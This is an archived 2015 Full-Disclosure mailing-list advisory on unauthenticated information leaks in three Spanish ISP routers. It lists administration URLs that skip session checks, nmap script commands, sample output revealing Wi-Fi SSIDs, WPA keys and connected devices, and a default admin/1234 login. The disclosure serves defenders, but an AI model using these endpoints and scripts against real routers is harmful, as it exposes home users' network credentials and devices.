lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAGSo8sdpZFWjqCkVcvzyROEjnRCX52sabjDHOROWVd-GDRAkGw@mail.gmail.com>
Date: Fri, 20 Nov 2015 11:17:16 +0100
From: Daniel Díez <danihzt@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Leak information on Huawei HG253s v2,
 Comtrend VG 8050 and ADB P.DGA4001N (HomeStation)

Huawei HG253s v2
Vodafone-Spain is starting to rent a new Huawei HG253v2 router to the
spanish costumers. This new router is coming with a new firmware version.
This bug has been found by @VicenDominguez

Vulnerability

Basically, it is not validating the session cookie in some administration
webpages. So, It is possible to get direct information from those urls in
any router open to internet.

http://IPhtml_253s/api/ntwk/WlanBasic
http://IP/html_253s/api/system/diagnose_internet
http://IP/html_253s/api/system/hostinfo?type=ethhost
http://IP/html_253s/api/system/hostinfo?type=guesthost
http://IP/html_253s/api/system/hostinfo?type=homehost
http://IP/html_253s/api/system/hostinfo?type=wifihost
http://IP/html_253s/api/system/wizardcfg

Usage

nmap --script=http-enum-vodafone-hua253s.nse -p80,443 -sS x.x.x.x

Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT    STATE SERVICE
80/tcp  open  http
| http-enum-vodafone-hua253s:
|   SSID: vodafone070 (14:b9:XX:XX:XX:XX) Password: (AES) 123456
|   Device: android-246e67b281179679-Wireless MAC: 48:5A:3F:XX:XX:XX IP:
192.168.0.XX

Comtrend VG 8050

Telefonica-Spain is starting to rent a new Comtrend VG 8050 router to the
spanish costumers. This new router is coming with a new firmware version.
This bug has been found by @DaniLabs

Vulnerability

Basically, it is not validating the session cookie in some administration
webpages. So, It is possible to get direct information from those urls in
any router open to internet.

http://IP/getWifiInfo.jx
http://IP/listDevices.jx
http://IP/infoApplications.jx

Usage

nmap --script=http-enum-telefonica-comtrend-vg-8050.nse -p80,443 -sS x.x.x.x

Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT    STATE SERVICE
80/tcp  open  http
| http-enum-telefonica-comtrend-vg-8050:
|   SSID: MOVISTAR_XXX
|   Cipher Algorithm: WPA
|   Password WEP:
|   Password WPA: gTU3NkXE44RYjuM2RrxM
|   Password WPA2:
|   Device: 192.168.0.X MAC: 5c:97:X:X:X:X IP: 192.168.0.X

ADB P.DGA4001N (HomeStation)
Telefonica-Spain is starting to rent a new ADB P.DGA4001N router to the
spanish costumers. This new router is coming with a new firmware version.
This bug has been found by @DaniLabs

Vulnerability

Basically, it is not validating the session cookie in some administration
webpages. So, It is possible to get direct information from those urls in
any router open to internet.

http://IP/getWifiInfo.jx
http://IP/listDevices.jx
http://IP/infoApplications.jx

Add the credentials by default are admin / 1234

Usage

nmap --script=http-enum-telefonica-homestation.nse -p80,443 -sS x.x.x.x

Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT    STATE SERVICE
80/tcp  open  http
| http-enum-telefonica-homestation:
|   SSID: WLAN_HOME
|   Cipher Algorithm: WEP
|   Device: IphonePedro MAC: A8:8E:24:X:X:X IP: 192.168.1.X

Here the scripts https://github.com/DaniLabs/scripts-nse

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists